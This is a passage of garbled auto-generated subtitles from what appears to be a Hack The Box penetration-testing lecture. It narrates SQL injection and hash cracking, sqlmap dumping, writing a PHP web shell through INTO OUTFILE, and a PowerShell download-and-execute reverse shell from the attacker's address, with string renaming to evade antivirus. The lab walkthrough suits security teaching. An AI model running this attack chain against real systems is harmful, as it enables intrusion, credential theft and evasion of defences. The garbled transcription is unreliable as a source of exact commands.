see what we did wrong. 798 00:57:40,050 --> 00:57:41,550 Probably the comma here. 799 00:57:46,060 --> 00:57:46,580 That was it. 800 00:57:47,560 --> 00:57:54,460 So now we can see the hashes of all these accounts, so I bet if we search this hash. 801 00:57:55,680 --> 00:58:03,300 We'll see that it matches the hash we've already captured for the manager, which is in Kretz, right. 802 00:58:05,070 --> 00:58:09,180 Yes, so if we first what we can do is we can do pseudo. 803 00:58:10,860 --> 00:58:19,950 Hash ID should be just to make sure that this is a sha one hash, and it is so if we've got a hash killer. 804 00:58:22,060 --> 00:58:26,380 Hash kill that I know we can pop it in and see if it's been cracked before. 805 00:58:29,070 --> 00:58:32,190 So hash cracker shot one. 806 00:58:33,510 --> 00:58:35,160 Control the pace to submit. 807 00:58:36,510 --> 00:58:39,930 Yes, let me in, you see it right, let's go to search again. 808 00:58:40,730 --> 00:58:44,570 Let's go back to berp and if we grab this one. 809 00:58:46,070 --> 00:58:47,450 We can see if this has been cracked. 810 00:58:50,530 --> 00:58:52,180 Control pays to submit. 811 00:58:53,390 --> 00:58:55,220 And it has never got more Cretz. 812 00:59:10,440 --> 00:59:16,530 Tidy this up a bit, and the user name is Hector, and we got this. 813 00:59:19,630 --> 00:59:27,160 Discovered via schoolie from my school, that user table. 814 00:59:30,170 --> 00:59:33,290 Now, one thing you could do as one single map on this tour, so you can see. 815 00:59:36,990 --> 00:59:41,670 You know what this would do, so if we do, because I want you to see the manual method now, we can 816 00:59:41,670 --> 00:59:48,000 also see the the automated method control a shift to a hotel control. 817 00:59:55,640 --> 00:59:59,570 We can actually save everything in a file, so if we go back to here. 818 01:00:01,390 --> 01:00:03,430 We can grab this right quick. 819 01:00:04,250 --> 01:00:04,660 Copy. 820 01:00:05,840 --> 01:00:10,040 Now, by the way, we could say right, click copy to file, but if I do it this way. 821 01:00:11,960 --> 01:00:14,900 It's probably not going to work because burping is not running. 822 01:00:15,200 --> 01:00:15,830 Oh, it did work. 823 01:00:15,980 --> 01:00:16,640 I surprised. 824 01:00:17,950 --> 01:00:21,520 Let's go here and let's see if we have it now, Kat wrecked that school. 825 01:00:29,120 --> 01:00:30,230 Where did the save that file? 826 01:00:32,310 --> 01:00:32,820 Very quick. 827 01:00:36,390 --> 01:00:40,950 Copy 2000, wreck that sequel. 828 01:00:43,720 --> 01:00:44,380 I save. 829 01:00:48,660 --> 01:00:50,780 It's not here, so that's OK. 830 01:00:52,320 --> 01:00:54,210 See them direct sequel. 831 01:00:56,460 --> 01:00:58,740 We'll make it easy, I. 832 01:01:00,530 --> 01:01:09,200 Control should be what we will do here is we will clean up this input here because a injection via a 833 01:01:09,220 --> 01:01:14,400 school map, they don't want the request to have the attack string present. 834 01:01:14,420 --> 01:01:15,470 So I just removed everything. 835 01:01:16,350 --> 01:01:23,440 Up to this, and I'm going to say escape shift can request a sequel. 836 01:01:24,460 --> 01:01:24,920 Looks good. 837 01:01:28,470 --> 01:01:30,240 Now, when I was in school math. 838 01:01:31,480 --> 01:01:32,070 Should be better. 839 01:01:36,330 --> 01:01:41,530 If we go up here, control page up, we can see a couple of things here, right? 840 01:01:43,060 --> 01:01:45,160 So we obviously want to. 841 01:01:51,360 --> 01:01:54,660 Do Bache never ask user input, user default behavior? 842 01:01:56,710 --> 01:01:59,080 I'm actually not seeing everything here, so we could. 843 01:02:01,210 --> 01:02:01,810 I think if we. 844 01:02:03,530 --> 01:02:07,010 Do a tech help like this, it gives us more verbose help. 845 01:02:11,970 --> 01:02:13,410 Oh, sure, advanced help. 846 01:02:16,030 --> 01:02:16,750 H h. 847 01:02:27,450 --> 01:02:33,450 Yeah, this is super advanced here, so we want to do a request, file a request from a file. 848 01:02:36,360 --> 01:02:39,120 They want to do Bache and. 849 01:02:40,500 --> 01:02:45,960 We could specify user agents string's, I'm actually not going to use random agents because I want you 850 01:02:45,960 --> 01:02:48,880 guys to see in the logs come later when we were compromised. 851 01:02:48,940 --> 01:02:51,180 So I don't want you to see what it look like. 852 01:02:53,940 --> 01:02:55,070 And what else do we want to do? 853 01:03:00,960 --> 01:03:05,220 So we can set the level, the default is one we want to set this to five. 854 01:03:06,200 --> 01:03:10,910 And we want to set the risk to three, of course, this is a real engagement, we wouldn't put the highest 855 01:03:10,910 --> 01:03:17,000 risk and level because you might again fly in the box, but because it's hack the box and it's a virtual 856 01:03:17,000 --> 01:03:18,410 machine in a safe environment. 857 01:03:18,410 --> 01:03:19,520 It's OK to do that here. 858 01:03:25,080 --> 01:03:26,520 And then why do we want to deal with on a. 859 01:03:30,810 --> 01:03:34,890 Take a look at what we can do, let's just dump everything. 860 01:03:42,230 --> 01:03:43,190 All right, so that's running. 861 01:03:50,150 --> 01:03:51,580 That is absolutely amazing. 862 01:03:53,630 --> 01:03:55,700 You see, it's grabbing everything from this database. 863 01:03:55,910 --> 01:04:00,470 It's basically doing an automated basically it's automating what we did manually. 864 01:04:02,570 --> 01:04:07,160 It already cracked one of the passwords which you already knew was cool to see that it grabbed it. 865 01:04:09,330 --> 01:04:13,860 See, it's storing everything in the CSP file here, so we're going to take a look at that once it finishes. 866 01:04:15,530 --> 01:04:20,150 All right, so let's grab this let's actually just go to this folder. 867 01:04:26,810 --> 01:04:29,870 Of course we can't, so we need to first turn into root. 868 01:04:41,410 --> 01:04:42,400 I've gone to my school. 869 01:04:43,690 --> 01:04:46,270 See a bunch of things, including user NSV. 870 01:04:47,680 --> 01:04:49,870 So we could open this if we do. 871 01:04:52,570 --> 01:04:53,500 Were office. 872 01:05:06,050 --> 01:05:08,440 And yet everything looks good here, let's just go and open it. 873 01:05:12,590 --> 01:05:17,500 OK, and you can see pretty much what we saw through the manual methods, right? 874 01:05:17,590 --> 01:05:18,770 We've got that password's. 875 01:05:20,870 --> 01:05:22,240 We've got the usernames. 876 01:05:23,940 --> 01:05:29,460 These are the hashes, but, you know, we crack these hatches and we found out what we needed and you 877 01:05:29,460 --> 01:05:30,630 can see this one is cracked here. 878 01:05:31,530 --> 01:05:33,590 Looks like single map wasn't able to crack Hector. 879 01:05:34,490 --> 01:05:39,380 But we did crack it by going to house killer and finding it that way, so, you know, there's always 880 01:05:39,380 --> 01:05:43,610 some value in using automated tools, but now at least you know how it works. 881 01:05:44,540 --> 01:05:46,850 You can actually see if we should go up in his output. 882 01:05:46,850 --> 01:05:49,190 You can see a couple of the tables that are discovered. 883 01:05:49,580 --> 01:05:49,940 Right. 884 01:05:53,760 --> 01:05:54,630 Some of the tables. 885 01:06:00,280 --> 01:06:02,170 So that is kind of interesting. 886 01:06:08,140 --> 01:06:10,520 Yeah, so there we go. 887 01:06:10,990 --> 01:06:12,010 Now, what can we do? 888 01:06:12,700 --> 01:06:15,250 Well, let's see if we can write a file. 889 01:06:15,280 --> 01:06:16,420 Let's see if we can write a show. 890 01:06:16,930 --> 01:06:18,140 So let's duplicate this. 891 01:06:18,970 --> 01:06:20,590 I wish there was a way to keep tabs. 892 01:06:23,330 --> 01:06:24,650 So might have to copy this here. 893 01:06:27,360 --> 01:06:29,880 And we'll name this tab or shall upload. 894 01:06:31,640 --> 01:06:36,320 So Target could put the IPN, put any. 895 01:06:41,140 --> 01:06:43,710 On anice Web show. 896 01:06:50,520 --> 01:06:52,350 OK, what else do we need? 897 01:06:52,410 --> 01:07:03,390 Let's grab this control, see jewelry and then control space just to make sure we're still getting what 898 01:07:03,390 --> 01:07:03,720 we want. 899 01:07:03,720 --> 01:07:08,780 They're all right and I'm going to put my search so we get to where we want to go. 900 01:07:10,680 --> 01:07:11,730 Chorus girl, sweet. 901 01:07:13,200 --> 01:07:14,040 So how can we write a song? 902 01:07:14,070 --> 01:07:16,470 Well, there's a couple of ways we can load it. 903 01:07:16,920 --> 01:07:24,880 We can dump into that is a MySQL command into a dump file. 904 01:07:26,340 --> 01:07:26,940 Here it is. 905 01:07:30,860 --> 01:07:39,320 Yeah, so if you do select into outpoll, this is a common way of riding into my radio or my school 906 01:07:40,220 --> 01:07:49,040 and this one will because it's so common, it's easier to detect this one or two is less common. 907 01:07:49,370 --> 01:07:54,790 And so we can actually use this syntax to try to write some arbitrary commands to the Web server. 908 01:07:55,600 --> 01:07:56,150 Copy that. 909 01:07:56,360 --> 01:07:59,060 Let's go back to Europe and see how we can craft this query. 910 01:08:01,400 --> 01:08:05,300 This is how I like to do it, I like to paste it into the bottom where it's going to simplify this query 911 01:08:06,770 --> 01:08:10,970 by getting rid of everything inside here, I just putting a one. 912 01:08:13,140 --> 01:08:14,330 Let's just make sure it still works. 913 01:08:20,280 --> 01:08:22,830 Right, it's not working because of this, let's get rid of this right here. 914 01:08:28,980 --> 01:08:29,310 Right. 915 01:08:29,940 --> 01:08:30,500 It works, right? 916 01:08:30,550 --> 01:08:31,980 You see that one there they put through. 917 01:08:34,420 --> 01:08:37,040 Controlled space, so that's our insertion point. 918 01:08:37,780 --> 01:08:38,800 So why do we want to put there? 919 01:08:39,580 --> 01:08:44,430 Well, it's a select anti dump file and a file path, right. 920 01:08:46,060 --> 01:08:47,740 And what do we want to write? 921 01:08:47,770 --> 01:08:51,580 So first, let's grab this right here, Control X.. 922 01:08:52,030 --> 01:08:56,560 This comes at the end of the query, so we'll put it right between the 6th and the end of the query 923 01:08:56,560 --> 01:08:56,980 right here. 924 01:08:59,670 --> 01:09:06,360 And his output file path, it's probably going to be something a see drive the go here, we can see 925 01:09:07,230 --> 01:09:08,280 this is the path, right? 926 01:09:08,490 --> 01:09:09,360 So just copy that. 927 01:09:11,620 --> 01:09:14,350 Let's go back here and put this in. 928 01:09:16,640 --> 01:09:20,390 He what his name it, BHP and Rio, that BHP 929 01:09:23,450 --> 01:09:28,550 last name is something kind of discreet update that BHP right. 930 01:09:29,030 --> 01:09:34,910 And then we have a select in this well, what are we dumping into this pile and what we put here? 931 01:09:35,450 --> 01:09:35,780 Right. 932 01:09:36,470 --> 01:09:45,320 So let's go ahead and put some BHP code to put in BHP and Rio, see if that works. 933 01:09:48,800 --> 01:09:49,760 Control space. 934 01:09:52,380 --> 01:09:54,180 And it says, I got a general error. 935 01:09:57,760 --> 01:09:58,930 If I try to send it again. 936 01:10:00,900 --> 01:10:01,770 Now it says. 937 01:10:03,400 --> 01:10:10,210 At the file already exists, so it's probably their control of one. 938 01:10:13,640 --> 01:10:14,840 And info. 939 01:10:17,580 --> 01:10:18,270 What do we name it? 940 01:10:19,110 --> 01:10:19,830 We need to update. 941 01:10:24,870 --> 01:10:31,680 Yes, so this is really good and we can actually see that this is it saying it's Windows Server 2016. 942 01:10:32,320 --> 01:10:33,890 So we've got more information here. 943 01:10:33,900 --> 01:10:39,660 And since we are able to write arbitrate files to the Web server and then we can access those files, 944 01:10:40,200 --> 01:10:41,270 we can upload a Web show. 945 01:10:42,240 --> 01:10:45,820 So it's convertors harmless, potentially harmless query into a Web show. 946 01:10:45,890 --> 01:10:48,360 Now, I'm going to send this to system. 947 01:10:50,880 --> 01:10:58,070 I'm going to name it like so, and since these are single ticks, neither single text would make it 948 01:10:58,070 --> 01:10:58,760 a conflict. 949 01:10:58,760 --> 01:11:00,680 So let's change these to double quotes. 950 01:11:01,680 --> 01:11:02,730 On the outside. 951 01:11:04,390 --> 01:11:07,390 And probably the cheapest file name, so let's say update's. 952 01:11:10,570 --> 01:11:11,920 And control space. 953 01:11:14,630 --> 01:11:16,010 Changes to updates. 954 01:11:17,900 --> 01:11:21,770 That's good to see that what we're doing is we're passing this parameter. 955 01:11:23,410 --> 01:11:25,520 And we're going to say, who am I going to put in a command? 956 01:11:25,540 --> 01:11:26,370 And it works. 957 01:11:26,980 --> 01:11:31,300 So the way this works is we're actually using this request function. 958 01:11:32,670 --> 01:11:35,670 So if got a P dot net. 959 01:11:37,130 --> 01:11:38,630 You can see what this does. 960 01:11:42,180 --> 01:11:50,340 It's a request of variables, it's an array that stores get post and cookie requests, so here you put 961 01:11:50,340 --> 01:11:55,320 it in a get request with this variable sequel's, which was defined here. 962 01:11:56,820 --> 01:12:01,140 So the value of C is who am I? 963 01:12:02,220 --> 01:12:03,840 And remains a Windows command. 964 01:12:04,650 --> 01:12:07,710 And that's being passed to system. 965 01:12:07,980 --> 01:12:09,030 So it's going to be executed. 966 01:12:10,820 --> 01:12:17,870 On the system, on the local system and the results to be reflected in the HTP response, and that's 967 01:12:17,870 --> 01:12:19,560 why we see this right here. 968 01:12:19,580 --> 01:12:25,970 For example, I can do I can pick right in the configuration of the system. 969 01:12:26,970 --> 01:12:27,830 I can see the IP. 970 01:12:28,430 --> 01:12:29,240 Where is it? 971 01:12:29,660 --> 01:12:30,380 Here it is right here. 972 01:12:31,370 --> 01:12:35,450 If we do control you, you'll see it's nicely formatted, right. 973 01:12:36,050 --> 01:12:38,720 So now let's turn this into a proper show. 974 01:12:39,980 --> 01:12:44,300 And first, I want to make sure that our show is actually on here because I don't make my life easier. 975 01:12:45,800 --> 01:12:47,920 And it is because it's power show command worked. 976 01:12:47,930 --> 01:12:50,690 If I type power show three ls in error message. 977 01:12:50,690 --> 01:12:50,930 Right. 978 01:12:51,380 --> 01:12:52,280 What we just get nothing. 979 01:12:52,760 --> 01:12:56,760 But when I remove one of the else, you can see we get what we want so we no power show. 980 01:12:56,760 --> 01:12:59,050 We can pass arbitrary commands to power. 981 01:12:59,060 --> 01:13:01,690 Shell on the victim, just turn on berp. 982 01:13:03,350 --> 01:13:04,490 And let's grab this. 983 01:13:07,110 --> 01:13:09,720 In the history. 984 01:13:12,410 --> 01:13:13,940 Control or control shift are. 985 01:13:15,800 --> 01:13:18,670 And we'll need this Web site. 986 01:13:18,830 --> 01:13:19,670 My name is noshing. 987 01:13:22,090 --> 01:13:25,870 That's the that's the name of our show we're going to use, and I want to change it from a get request 988 01:13:25,870 --> 01:13:31,600 method to a post so that I don't run into any character encoding issues. 989 01:13:31,600 --> 01:13:34,640 And it's a lot easier to read this way until space. 990 01:13:35,200 --> 01:13:35,740 There we go. 991 01:13:36,700 --> 01:13:37,600 What are we going to do here? 992 01:13:38,320 --> 01:13:39,130 Let's start mashing. 993 01:13:39,940 --> 01:13:41,220 So locate mashing. 994 01:13:42,700 --> 01:13:45,970 If you don't have the change, you can just see the app install Dasheng. 995 01:13:48,090 --> 01:13:55,770 So and you can see what we actually want is this invoke power, shall TCBY, it's going to grab this 996 01:13:56,190 --> 01:14:04,590 pseudo copy control TV, copy that to the current folder then. 997 01:14:06,970 --> 01:14:10,750 And that's the only one said no. 998 01:14:12,250 --> 01:14:19,570 And what we need to do is go down here and we're going to use this template on this line so we can update 999 01:14:19,570 --> 01:14:22,100 the IP address and port to connect back to. 1000 01:14:22,420 --> 01:14:27,220 So this is going to be the IP address and port that the vector machine is going to connect back to on 1001 01:14:27,220 --> 01:14:27,970 our target machine. 1002 01:14:28,000 --> 01:14:31,720 So this is our local attack, our IP in the local attack report. 1003 01:14:32,030 --> 01:14:32,350 OK. 1004 01:14:33,870 --> 01:14:35,040 So I'm going to press. 1005 01:14:36,560 --> 01:14:42,830 Y why to yank capital G, to go to the bottom, I insert mode, enter and then escape. 1006 01:14:44,880 --> 01:14:53,360 Capably and I delivered the word I was going to put in our IP address, let's see, do we really do 1007 01:14:53,360 --> 01:15:00,700 we delete what are we control, 80 percent percent IPA 10 zero. 1008 01:15:00,840 --> 01:15:02,370 We are 10, 10, 14, 10. 1009 01:15:05,780 --> 01:15:11,540 Ten, ten, 14, ten, and is part four for three, because that's usually allowed on firewall's escape 1010 01:15:12,050 --> 01:15:12,340 easy. 1011 01:15:14,280 --> 01:15:23,130 OK, now what we can do is we can set the Web server on our local box, importante, and then we can 1012 01:15:23,790 --> 01:15:31,230 set up a local cat listener on point four for three to catch all our show. 1013 01:15:35,050 --> 01:15:37,870 So let me explain what's going to happen in a second. 1014 01:15:38,380 --> 01:15:46,810 Let me first create the command so we're going to say power shall invoke expression invoked by request 1015 01:15:47,260 --> 01:15:52,420 EDP 10, 10, 14, 10, invoke power shall. 1016 01:15:55,120 --> 01:15:59,080 TCP IP is one use basic parsing. 1017 01:16:01,820 --> 01:16:02,540 I believe that's it. 1018 01:16:04,160 --> 01:16:05,580 Let's explain what's happening here. 1019 01:16:06,110 --> 01:16:06,590 So. 1020 01:16:08,400 --> 01:16:13,180 This is our talking machine, we're hosting this show, which were just modified, right? 1021 01:16:13,890 --> 01:16:23,660 This is telling the voting machine to make a get request to the attack machine and download this Parishad 1022 01:16:23,670 --> 01:16:24,120 script. 1023 01:16:25,200 --> 01:16:26,260 And executed. 1024 01:16:26,290 --> 01:16:30,610 That's what the folk expression means, evocative memory when it tries to execute a script. 1025 01:16:30,630 --> 01:16:37,850 The script contains code to establish Reverso from the victim to the attackers PT. one four four three. 1026 01:16:38,310 --> 01:16:40,740 So we should get a shell in this box here. 1027 01:16:42,900 --> 01:16:43,800 It's going to hit send. 1028 01:16:46,090 --> 01:16:49,790 And we see the download right here, but no show. 1029 01:16:50,870 --> 01:16:56,300 So we probably have like 80 or something on that on that the victim, that's nothing with us. 1030 01:16:57,800 --> 01:16:59,860 Windows Defender has been getting a lot better these days. 1031 01:17:00,110 --> 01:17:04,810 So I have to do some things that's gotten my name invoked. 1032 01:17:04,820 --> 01:17:10,160 Power shall perhaps the local evening is just doing basic static string analysis. 1033 01:17:10,830 --> 01:17:17,840 So escape and we can just obfuscate the string and get past the avy, see if we can do Pseudo said. 1034 01:17:20,780 --> 01:17:30,440 I am going to substitute everywhere we see our Shall Tsipi going to replace it with full Jeanine's global 1035 01:17:30,590 --> 01:17:32,190 capital, Emin's case insensitive. 1036 01:17:32,210 --> 01:17:33,800 That's how I was able to invoke power. 1037 01:17:33,800 --> 01:17:40,790 Shall TCBY in lower case in the file I want to do this substitution on is invoked as power shall tcp 1038 01:17:40,790 --> 01:17:41,390 ip as one. 1039 01:17:42,680 --> 01:17:44,540 The dashi just means do it in place. 1040 01:17:45,920 --> 01:17:47,600 You mean substitute the string. 1041 01:17:48,700 --> 01:17:49,480 With this string. 1042 01:17:50,910 --> 01:17:59,250 Right here and then, right, the new movie Substitutive file back into the original here right now, 1043 01:17:59,250 --> 01:18:07,040 if I do, let's see Cat invoke GRAP and I to look for food. 1044 01:18:07,710 --> 01:18:08,310 You'll see. 1045 01:18:09,880 --> 01:18:11,160 These lines have been updated, right? 1046 01:18:11,210 --> 01:18:18,910 That's the last line in the file, so I think if we do that and it shows the, you know, the line numbers 1047 01:18:19,570 --> 01:18:23,290 to one point seven to last line, and so this has been updated to now let's try it. 1048 01:18:24,880 --> 01:18:31,680 We are still listening on board any and we're still waiting for the shelling for four three, control 1049 01:18:31,900 --> 01:18:35,110 the space, taking a little bit longer time. 1050 01:18:35,110 --> 01:18:39,340 And bam, we've got to show where my eyes are. 1051 01:18:41,380 --> 01:18:48,650 All right, so we've got this shell and we can see who else is on the box, looks like this administrator 1052 01:18:48,650 --> 01:18:52,080 and there's a guest, there's there's Hector. 1053 01:18:52,720 --> 01:19:01,630 And so in the next lecture, we're actually going to do a horizontal escalation from this particular 1054 01:19:01,630 --> 01:19:04,900 user user, which appears to be a service. 1055 01:19:04,900 --> 01:19:10,330 This is probably this is actually the service account that's running the IRS Web application. 1056 01:19:10,990 --> 01:19:13,150 And we'll investigate this again once we pop the box. 1057 01:19:13,180 --> 01:19:15,940 We'll take a look at the services in the way it's set up. 1058 01:19:16,210 --> 01:19:21,220 But next lecture, we're going to do horizontal escalation into Hektor and then the next lecture that 1059 01:19:21,220 --> 01:19:24,430 will move into a true system compromised. 1060 01:19:24,430 --> 01:19:28,830 When we move, we get system system access to the endpoint. 1061 01:19:29,320 --> 01:19:29,570 Right. 1062 01:19:29,610 --> 01:19:30,550 I'll see in the next lecture.